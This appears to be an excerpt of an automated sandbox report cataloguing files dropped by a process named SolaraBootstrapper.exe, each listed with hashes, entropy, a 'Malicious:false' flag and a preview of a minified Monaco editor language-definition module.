                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/lua/lua", ["require","require"],(require)=>{.var moduleExports=(()=>{var s=Object.defineProperty;var a=Object.getOwnPropertyDescriptor;var i=Object.getOwnPropertyNames;var l=Object.prototype.hasOwnProperty;var c=(o,e)=>{for(var t in e)s(o,t,{get:e[t],enumerable:!0})},m=(o,e,t,r)=>{if(e&&typeof e=="object"||typeof e=="function")for(let n of i(e))!l.call(o,n)&&n!==t&&s(o,n,{get:()=>e[n],enumerable:!(r=a(e,n))||r.enumerable});return o};var p=o=>m(s({},"__esModule",{value:!0}),o);var u={};c(u,{conf:()=>d,language:()=>g});var d={comments:{lineComment:"--",blockComment:["-
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (3139)
                                                  Category:dropped
                                                  Size (bytes):3636
                                                  Entropy (8bit):5.545341243626053
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRs3Q+/EsaV1+UBgqoXDR208zpKfkR6uvO6zhGIi:G9YVGg0kpKfkR6uvdhc
                                                  MD5:F292917045D92569E955014DB9B0199D
                                                  SHA1:0942ED7251D97857E7FC835CE83ACDBB6D10F4BB
                                                  SHA-256:BCDDB65CFDC3C63E67CCF57993ECEA2F279B61F92AD046E096D980A706D23017
                                                  SHA-512:7788BE4D1E377BDEC5275D505BCA9B413A52846618AA79F7929C710A85007D6802094D733D182E644612E15A75338C5DA395893AC8B5AD8CEB0E51EF4AE00002
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/m3/m3", ["require","require"],(require)=>{.var moduleExports=(()=>{var r=Object.defineProperty;var E=Object.getOwnPropertyDescriptor;var a=Object.getOwnPropertyNames;var i=Object.prototype.hasOwnProperty;var R=(o,e)=>{for(var s in e)r(o,s,{get:e[s],enumerable:!0})},c=(o,e,s,n)=>{if(e&&typeof e=="object"||typeof e=="function")for(let t of a(e))!i.call(o,t)&&t!==s&&r(o,t,{get:()=>e[t],enumerable:!(n=E(e,t))||n.enumerable});return o};var m=o=>c(r({},"__esModule",{value:!0}),o);var N={};R(N,{conf:()=>A,language:()=>p});var A={comments:{blockComment:["(*","*)"]},brackets:
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:exported SGML document, ASCII text, with very long lines (4110)
                                                  Category:dropped
                                                  Size (bytes):4619
                                                  Entropy (8bit):5.439673301140114
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRs1+/EzK1sV1+b+VcqZEmFpCFY4cDWEzk:G9YD10KARFcq4b
                                                  MD5:9354B068E6E2DAAF2F3023DED710E8A0
                                                  SHA1:A31B100F17182F11B607F1339F425034B6B09DFA
                                                  SHA-256:66F8B288EDE67F908CB776AEFF8C9E24996182B878C5DA7FFA4BD6F3CBC38A6B
                                                  SHA-512:6055251EF5A633100976B1BBA11946FDBCBBF6169FADDBD2CE9FB20F4EED25C04247BD967BCE6E9C1399C88B4FAC708328CD0750E9E8E03774D0F548EBFBC73A
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/markdown/markdown", ["require","require"],(require)=>{.var moduleExports=(()=>{var s=Object.defineProperty;var r=Object.getOwnPropertyDescriptor;var c=Object.getOwnPropertyNames;var i=Object.prototype.hasOwnProperty;var l=(t,e)=>{for(var o in e)s(t,o,{get:e[o],enumerable:!0})},m=(t,e,o,a)=>{if(e&&typeof e=="object"||typeof e=="function")for(let n of c(e))!i.call(t,n)&&n!==o&&s(t,n,{get:()=>e[n],enumerable:!(a=r(e,n))||a.enumerable});return t};var d=t=>m(s({},"__esModule",{value:!0}),t);var b={};l(b,{conf:()=>p,language:()=>g});var p={comments:{blockComment:[" ","-
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (5457)
                                                  Category:dropped
                                                  Size (bytes):5956
                                                  Entropy (8bit):5.389474005763087
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsvsV///MwChmQgNujV1+73PVkd2wQkHmRUlmKo4riz0625EQ2OC7j/g3:G9YVJD0KGBlZcQ2OC7j/g3
                                                  MD5:F4FBE65AC8368AE95154F94E294B70B0
                                                  SHA1:A0EC67FC033B4DDA8C86FF4576AAE27E875EFCE2
                                                  SHA-256:12E41644E29F943E567E09043AC95F9AFE3A12F78221662A7C35561424D30AB6
                                                  SHA-512:A70E0BEC4C66AE7589F33898BE700EEDCA34D47C330AEE4DDB1BC70881D25784A6C4CF782F40901920FD196E0F74813EB3F20BEB35D9A329BEB7491A7BB34EE1
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/mdx/mdx", ["require","require"],(require)=>{.var moduleExports=(()=>{var x=Object.create;var r=Object.defineProperty;var m=Object.getOwnPropertyDescriptor;var l=Object.getOwnPropertyNames;var b=Object.getPrototypeOf,g=Object.prototype.hasOwnProperty;var h=(e=>typeof require!="undefined"?require:typeof Proxy!="undefined"?new Proxy(e,{get:(t,n)=>(typeof require!="undefined"?require:t)[n]}):e)(function(e){if(typeof require!="undefined")return require.apply(this,arguments);throw new Error('Dynamic require of "'+e+'" is not supported')});var f=(e,t)=>()=>(t||e((t={exports
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (2901)
                                                  Category:dropped
                                                  Size (bytes):3402
                                                  Entropy (8bit):5.378643167874997
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRs/b+/E5K83I0xqzJzDWqivUcme+fcAr6fmlW:G9YmdKWqzdTinmTcAr6f3
                                                  MD5:052FB8D724FCD43EC01697532CDAF113
                                                  SHA1:B264E5C86E37F6B11C06101D6DFAF4A9622EAD74
                                                  SHA-256:5EE4997C552F1F6BC4DECA08BBE628B9369AF09E5A94770BE18CD419963D834D
                                                  SHA-512:7176219436B8AC34B3AAAA8312A246057E4179FC97C1D45C1FAF8C0BE87BFC8DE4EBF07AF89E30308473AA783915BD4F39AFE7D1100A3EE2B50064DFFCF5C710
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/mips/mips", ["require","require"],(require)=>{.var moduleExports=(()=>{var s=Object.defineProperty;var a=Object.getOwnPropertyDescriptor;var o=Object.getOwnPropertyNames;var g=Object.prototype.hasOwnProperty;var l=(t,e)=>{for(var n in e)s(t,n,{get:e[n],enumerable:!0})},d=(t,e,n,i)=>{if(e&&typeof e=="object"||typeof e=="function")for(let r of o(e))!g.call(t,r)&&r!==n&&s(t,r,{get:()=>e[r],enumerable:!(i=a(e,r))||i.enumerable});return t};var m=t=>d(s({},"__esModule",{value:!0}),t);var x={};l(x,{conf:()=>p,language:()=>u});var p={wordPattern:/(-?\d*\.\d\w*)|([^\`\~\!\@\#
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (5234)
                                                  Category:dropped
                                                  Size (bytes):5737
                                                  Entropy (8bit):5.465257002365471
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsS+/kWrviqgq+q17qN/E18Qby0qbmofEsl93Bjy2rzR9sJDJOuz3O+Pn:G9YxmrTX8Ey0UJfEI9z+zz3O+PYLZy4m
                                                  MD5:BFB76AAFEBE565636C68AAC6095A7AFD
                                                  SHA1:0751212755B4ACDE2CE6D30FCF551BB94BA10825
                                                  SHA-256:F53EC8830DBA059C6F9FFE5D74AD6556372C927E4465EBEB6C27E1C7F915157D
                                                  SHA-512:DFC1DB5BE67B1F9DA82E40F18D5646072F7DA999393AA34776740077BC83CFC67091E8AACB776DA574001604B7E3A38408A9428A1300E83C71DC3C63B076F730
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/msdax/msdax", ["require","require"],(require)=>{.var moduleExports=(()=>{var e=Object.defineProperty;var I=Object.getOwnPropertyDescriptor;var O=Object.getOwnPropertyNames;var S=Object.prototype.hasOwnProperty;var n=(T,E)=>{for(var N in E)e(T,N,{get:E[N],enumerable:!0})},t=(T,E,N,R)=>{if(E&&typeof E=="object"||typeof E=="function")for(let A of O(E))!S.call(T,A)&&A!==N&&e(T,A,{get:()=>E[A],enumerable:!(R=I(E,A))||R.enumerable});return T};var L=T=>t(e({},"__esModule",{value:!0}),T);var D={};n(D,{conf:()=>C,language:()=>o});var C={comments:{lineComment:"//",blockComment
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (11596)
                                                  Category:dropped
                                                  Size (bytes):12099
                                                  Entropy (8bit):5.319774799341256
                                                  Encrypted:false
                                                  SSDEEP:192:G9Yw0XLxTgsX+lz/zvS6GEQ+izEdfANAM+U+hqXP0BpR2/6AVzIAtCH2jZLbf9bB:G4LxTFX+lfS6YUlANR060BpR2/6AVzIu
                                                  MD5:64226E32D6370034F3FB02C77E032A21
                                                  SHA1:F7BCAA92FE493FEEECB6002AB11458E475E6DFEF
                                                  SHA-256:CA45C24C9ECCC351207C790FCE382C66EE66E3B74562DEC74F3AD306CCF1687A
                                                  SHA-512:5372F818D1721F988434175AB4704AF0893E079631F8C9158046DE282D12E8E2A2B84F317F6491B1FCD626393AF4B126602FB9270FAA0F9774E7A0D2CDDD196D
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/mysql/mysql", ["require","require"],(require)=>{.var moduleExports=(()=>{var A=Object.defineProperty;var e=Object.getOwnPropertyDescriptor;var I=Object.getOwnPropertyNames;var N=Object.prototype.hasOwnProperty;var o=(T,E)=>{for(var R in E)A(T,R,{get:E[R],enumerable:!0})},O=(T,E,R,_)=>{if(E&&typeof E=="object"||typeof E=="function")for(let S of I(E))!N.call(T,S)&&S!==R&&A(T,S,{get:()=>E[S],enumerable:!(_=e(E,S))||_.enumerable});return T};var t=T=>O(A({},"__esModule",{value:!0}),T);var L={};o(L,{conf:()=>n,language:()=>C});var n={comments:{lineComment:"--",blockComment
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (2724)
                                                  Category:dropped
                                                  Size (bytes):3239
                                                  Entropy (8bit):5.272204051567214
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsNr+/ENQrbV1+/0V1+/0mTElRVACaV2Zz:G9YiarTxWwlRVSa
                                                  MD5:F086E871F5E2E4E4DCAC82BCF4047DC3
                                                  SHA1:B4BDBE871A9C42FCED591085E30C81665A6A1C46
                                                  SHA-256:15B5F02919DF2434A0D0305C301CF6450C98E0076FBFEE1BAAEF93D339B2102C
                                                  SHA-512:E3814E4FCF3B6612DC4604FAAE202CF3C8501CFD3FBEA9328906D0A9F6FB5125DC806A43AE45B0580237FB69F70DC7067AF6234B3C7717B8C2CFF49493F8B90F
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/objective-c/objective-c", ["require","require"],(require)=>{.var moduleExports=(()=>{var s=Object.defineProperty;var r=Object.getOwnPropertyDescriptor;var c=Object.getOwnPropertyNames;var a=Object.prototype.hasOwnProperty;var l=(o,e)=>{for(var t in e)s(o,t,{get:e[t],enumerable:!0})},p=(o,e,t,i)=>{if(e&&typeof e=="object"||typeof e=="function")for(let n of c(e))!a.call(o,n)&&n!==t&&s(o,n,{get:()=>e[n],enumerable:!(i=r(e,n))||i.enumerable});return o};var d=o=>p(s({},"__esModule",{value:!0}),o);var u={};l(u,{conf:()=>g,language:()=>m});var g={comments:{lineComment:"//",
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (3317)
                                                  Category:dropped
                                                  Size (bytes):3822
                                                  Entropy (8bit):5.199030723755683
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsF+/E8uqx+rVV1+h0V1+htq1csPr8d7jmT/7B171wGcGOD:G9Y/+rxTtdre3Y7bZi3
                                                  MD5:EBB86D239DD240BDCF3F7A0475615BF6
                                                  SHA1:9AF87F1CDB76FF0A701D6720DB22CEF7944E57C2
                                                  SHA-256:EA9B0CD3DF7BA28F7F9B4B484508D402096026C62399995278931CB91B45F3A1
                                                  SHA-512:0C4A7D7CC6A2BE95951C91846ADEFBE439DD1AA4897DC89EF5E5F6053E29C07A364C4D4B70A6F6F36D90DAEEFDF48DF97E8306C23534FCC60CC2CF5C82681720
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/pascal/pascal", ["require","require"],(require)=>{.var moduleExports=(()=>{var n=Object.defineProperty;var s=Object.getOwnPropertyDescriptor;var a=Object.getOwnPropertyNames;var l=Object.prototype.hasOwnProperty;var c=(t,e)=>{for(var r in e)n(t,r,{get:e[r],enumerable:!0})},d=(t,e,r,i)=>{if(e&&typeof e=="object"||typeof e=="function")for(let o of a(e))!l.call(t,o)&&o!==r&&n(t,o,{get:()=>e[o],enumerable:!(i=s(e,o))||i.enumerable});return t};var p=t=>d(n({},"__esModule",{value:!0}),t);var g={};c(g,{conf:()=>m,language:()=>u});var m={wordPattern:/(-?\d*\.\d\w*)|([^\`\~\!
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (2322)
                                                  Category:dropped
                                                  Size (bytes):2833
                                                  Entropy (8bit):5.276319973509025
                                                  Encrypted:false
                                                  SSDEEP:48:pQFDHn43tZRs1q+/E4HgUr5Xz0V1+hn0V1+hGkq1c/ChOa1Ta1xFiWwGcu08NQWp:pQFDHnYRsc+/EnUrmV1+h0V1+hrq1cKo
                                                  MD5:7CD7C5A710B6F648343C3DC509627CAE
                                                  SHA1:B3D7AD22D56D99583663BA70452F5505AB286032
                                                  SHA-256:11CF852948FC74873E7F58BD88C34E7AFF02E3655FAA2B75D741FAB0E07A1922
                                                  SHA-512:91D0E17EF3E6439DE584B0D0ACC79282BEC82FE1D358C55C49D71EBBF8595FECD094173526AB7ED85D6509CFC26C9A3F80A4108DD0051B84048D42342AEC1BBD
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/pascaligo/pascaligo", ["require","require"],(require)=>{.var moduleExports=(()=>{var s=Object.defineProperty;var i=Object.getOwnPropertyDescriptor;var a=Object.getOwnPropertyNames;var l=Object.prototype.hasOwnProperty;var c=(o,e)=>{for(var t in e)s(o,t,{get:e[t],enumerable:!0})},m=(o,e,t,r)=>{if(e&&typeof e=="object"||typeof e=="function")for(let n of a(e))!l.call(o,n)&&n!==t&&s(o,n,{get:()=>e[n],enumerable:!(r=i(e,n))||r.enumerable});return o};var p=o=>m(s({},"__esModule",{value:!0}),o);var u={};c(u,{conf:()=>d,language:()=>g});var d={comments:{lineComment:"//",bloc
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (8577)
                                                  Category:dropped
                                                  Size (bytes):9078
                                                  Entropy (8bit):5.485443479366475
                                                  Encrypted:false
                                                  SSDEEP:192:G9Y5D7i1x13K3752aCJIzbxAM+OBUv1a72L0039Td7:GIi1x13gF2awIzdALvLf3D7
                                                  MD5:8E3555E7568083AFD4DF43CA61D9A1D8
                                                  SHA1:AD70A170EFD01CF9905ED1533B4F6D4F25655316
                                                  SHA-256:1D5EEE661DA60FBA32173970D751B604FBC0DAA160BC4463128EE35EA5E306FE
                                                  SHA-512:BEE587D9C638A7341FB390E194592DD98C557648A30156656B209D13941A073DF8D354DD57B8B139842E3E36E835D4AB5D46183217C3FF07B7A725BF7DE40F62
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/perl/perl", ["require","require"],(require)=>{.var moduleExports=(()=>{var r=Object.defineProperty;var o=Object.getOwnPropertyDescriptor;var l=Object.getOwnPropertyNames;var d=Object.prototype.hasOwnProperty;var a=(t,e)=>{for(var n in e)r(t,n,{get:e[n],enumerable:!0})},$=(t,e,n,i)=>{if(e&&typeof e=="object"||typeof e=="function")for(let s of l(e))!d.call(t,s)&&s!==n&&r(t,s,{get:()=>e[s],enumerable:!(i=o(e,s))||i.enumerable});return t};var c=t=>$(r({},"__esModule",{value:!0}),t);var m={};a(m,{conf:()=>g,language:()=>p});var g={comments:{lineComment:"#"},brackets:[["{"
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (13786)
                                                  Category:dropped
                                                  Size (bytes):14289
                                                  Entropy (8bit):4.982761785168889
                                                  Encrypted:false
                                                  SSDEEP:384:GSULxaaCfwScWjRqvLCBX2ffO4ICe9basF:fULxaaC43URqveXSO4IzGsF
                                                  MD5:22ED3B43982BA51BABBF903F9F6E7B39
                                                  SHA1:3C3A3AE192C44F3232D0355E291A2B122D4BA746
                                                  SHA-256:354896AE790E785E67E7F0FE20836E49B8650413EBEBC0A497E600CD9BAEBB2A
                                                  SHA-512:6464F98F687D0DE4E35B0BE1A0A2F8267D40072BFD2D79BE911225ADD402BFE753EC7C5E945A2DCF19A7DFE2260AABF2AD360AD4A72BE3790BBD77B65E7F1C66
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/pgsql/pgsql", ["require","require"],(require)=>{.var moduleExports=(()=>{var r=Object.defineProperty;var o=Object.getOwnPropertyDescriptor;var i=Object.getOwnPropertyNames;var n=Object.prototype.hasOwnProperty;var p=(_,e)=>{for(var s in e)r(_,s,{get:e[s],enumerable:!0})},l=(_,e,s,a)=>{if(e&&typeof e=="object"||typeof e=="function")for(let t of i(e))!n.call(_,t)&&t!==s&&r(_,t,{get:()=>e[t],enumerable:!(a=o(e,t))||a.enumerable});return _};var g=_=>l(r({},"__esModule",{value:!0}),_);var m={};p(m,{conf:()=>c,language:()=>d});var c={comments:{lineComment:"--",blockComment
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:exported SGML document, ASCII text, with very long lines (8349)
                                                  Category:dropped
                                                  Size (bytes):8848
                                                  Entropy (8bit):5.400560472440332
                                                  Encrypted:false
                                                  SSDEEP:192:G9YnW+rr8hRld2BZwd0C4Ov6f+AME/gujck1wIJ3tjPG:Gn+rr8DxPSVrgk1w+3tC
                                                  MD5:A8B61ABECDB513D6103D45783D5496A0
                                                  SHA1:A33BCDBD4580BE4351E58BB4405B2D9170C04663
                                                  SHA-256:621F1298E5CE5879F6EC3F8EE887B0039D288690F2529752C13C5BA7166CAED7
                                                  SHA-512:171A706DFA046315635B2293400B8CF8E0364745EE98F99402B2AAD0177FFBB5B2AA7BC64C72A0E1932E3B17D23CC92E2CEFD8C6E46428EB233C7F3C6667F752
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/php/php", ["require","require"],(require)=>{.var moduleExports=(()=>{var i=Object.defineProperty;var o=Object.getOwnPropertyDescriptor;var m=Object.getOwnPropertyNames;var a=Object.prototype.hasOwnProperty;var s=(t,e)=>{for(var n in e)i(t,n,{get:e[n],enumerable:!0})},h=(t,e,n,r)=>{if(e&&typeof e=="object"||typeof e=="function")for(let p of m(e))!a.call(t,p)&&p!==n&&i(t,p,{get:()=>e[p],enumerable:!(r=o(e,p))||r.enumerable});return t};var l=t=>h(i({},"__esModule",{value:!0}),t);var u={};s(u,{conf:()=>d,language:()=>c});var d={wordPattern:/(-?\d*\.\d\w*)|([^\`\~\!\@\#\%
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (2005)
                                                  Category:dropped
                                                  Size (bytes):2504
                                                  Entropy (8bit):5.289439593338341
                                                  Encrypted:false
                                                  SSDEEP:48:pQFDHn43tZRs8c+/EOqHfcx5er20h1C0h1PY1gn6X3ZLBHsDkngfJyX61FDzT:pQFDHnYRs9+/EO6m5Kh1Jh1PY1gn63Tq
                                                  MD5:FA7111ACF3BAED2B702DDA6F3DBFD195
                                                  SHA1:D51AD22834D0CD9E174D354C513A696FDC676B31
                                                  SHA-256:65D24FD68D69EDBB30B01953C044E3502BAC0205E7A9DB0447E38562383BDDDD
                                                  SHA-512:CA38B26867155777945CC0FC1E579E215F79B5FC03C8423622EF9E1BEBF7AB1FC23C45BCE26F2FC0AD374A1EC0C63BFC229F221258509DDDA5931FDAC69FE369
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/pla/pla", ["require","require"],(require)=>{.var moduleExports=(()=>{var s=Object.defineProperty;var a=Object.getOwnPropertyDescriptor;var r=Object.getOwnPropertyNames;var p=Object.prototype.hasOwnProperty;var l=(o,e)=>{for(var n in e)s(o,n,{get:e[n],enumerable:!0})},c=(o,e,n,i)=>{if(e&&typeof e=="object"||typeof e=="function")for(let t of r(e))!p.call(o,t)&&t!==n&&s(o,t,{get:()=>e[t],enumerable:!(i=a(e,t))||i.enumerable});return o};var d=o=>c(s({},"__esModule",{value:!0}),o);var u={};l(u,{conf:()=>k,language:()=>m});var k={comments:{lineComment:"#"},brackets:[["[","
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (8178)
                                                  Category:dropped
                                                  Size (bytes):8687
                                                  Entropy (8bit):5.317344954369455
                                                  Encrypted:false
                                                  SSDEEP:192:G9YvATrsHJNHUKhfdGiAQ3Sv0vExaeZtSkgsh:GDrspNHsQ3SMMYc/
                                                  MD5:D15486DBF13FFD1D0BC4B2F70C444CC1
                                                  SHA1:53606B586DDCE79767A5CD7F82BDA30711A77B92
                                                  SHA-256:71E5EB8CAAF7112E99C4B7C6BEFAFC1805B47F3460AB520B22A1DF07B65F9FC3
                                                  SHA-512:1C3992421D4A7E3C10C746EA38973057C9A27A03D3DB51005BF3357EC07F6B5189866E975F50F6E9B1CFC37721492F649761001C27CC82937C3316B44A487E62
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/postiats/postiats", ["require","require"],(require)=>{.var moduleExports=(()=>{var i=Object.defineProperty;var a=Object.getOwnPropertyDescriptor;var s=Object.getOwnPropertyNames;var c=Object.prototype.hasOwnProperty;var p=(t,e)=>{for(var o in e)i(t,o,{get:e[o],enumerable:!0})},l=(t,e,o,r)=>{if(e&&typeof e=="object"||typeof e=="function")for(let n of s(e))!c.call(t,n)&&n!==o&&i(t,n,{get:()=>e[n],enumerable:!(r=a(e,n))||r.enumerable});return t};var d=t=>l(i({},"__esModule",{value:!0}),t);var g={};p(g,{conf:()=>m,language:()=>x});var m={comments:{lineComment:"//",blockC
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (17261)
                                                  Category:dropped
                                                  Size (bytes):17774
                                                  Entropy (8bit):5.109334056578057
                                                  Encrypted:false
                                                  SSDEEP:384:GA0rPW2Eoma/LPuYcZ9SWggnnDaWg5frZT8QjT7PC2KszxHQ2VOtJLIzIe2XkCk6:irPWcB116tQ/hSHiel
                                                  MD5:BF69FE64761332FEA600143E414831EB
                                                  SHA1:61131B8CBBD9BC45C54E6D40D9CD758C38425D79
                                                  SHA-256:6A450D27DDDE2CA99A5A38734F11578FE67CC5240CE251931F9454BACA45516A
                                                  SHA-512:CD46386807E5F2EF5900FCB28D35248FA89BD64C823A4831667973106C36A7FB2A14293243FF4ACCEB466701797D252AB16AB4B869538589AA498E2F27DB6543
                                                  Malicious:false
                                                  Preview:"use strict";/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.45.0(5e5af013f8d295555a7210df0d5f2cea0bf5dd56). * Released under the MIT license. * https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/powerquery/powerquery", ["require","require"],(require)=>{.var moduleExports=(()=>{var i=Object.defineProperty;var r=Object.getOwnPropertyDescriptor;var s=Object.getOwnPropertyNames;var l=Object.prototype.hasOwnProperty;var T=(t,e)=>{for(var n in e)i(t,n,{get:e[n],enumerable:!0})},m=(t,e,n,o)=>{if(e&&typeof e=="object"||typeof e=="function")for(let a of s(e))!l.call(t,a)&&a!==n&&i(t,a,{get:()=>e[a],enumerable:!(o=r(e,a))||o.enumerable});return t};var u=t=>m(i({},"__esModule",{value:!0}),t);var b={};T(b,{conf:()=>d,language:()=>c});var d={comments:{lineComment:"//",bl
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (3591)
                                                  Category:dropped
                                                  Size (bytes):4104
                                                  Entropy (8bit):5.521023817857264
                                                  Encrypted:false
                                                  SSDEEP:96:pQFDHnYRsW8+/EwoyGx+lsV1+K6V1+/pcnLsxxeGub2vLycArt6Gr9DLp:G9YL34+l0yUQQjMJ6Gr3
                                                  MD5:BC7424AAB71B3C118625A40FD63F4B5E
                                                  SHA1:2E33732B16770483B01E59D317BC7F4FA355A86C
                                                  SHA-256:4E376A8005C85FB5BDDE94F900920A29FAAA2735A9ED9CA2F9E28ABEF231FED0
                                                  SHA-512:EA96B33067A960F44065F8A004182C4A12285CAE4D23D038CFF804C45ECC148913481FDEF704E324DA8A344792CBF1745F77079585622246FCCCFEA002172E6A
                                                  Malicious:false
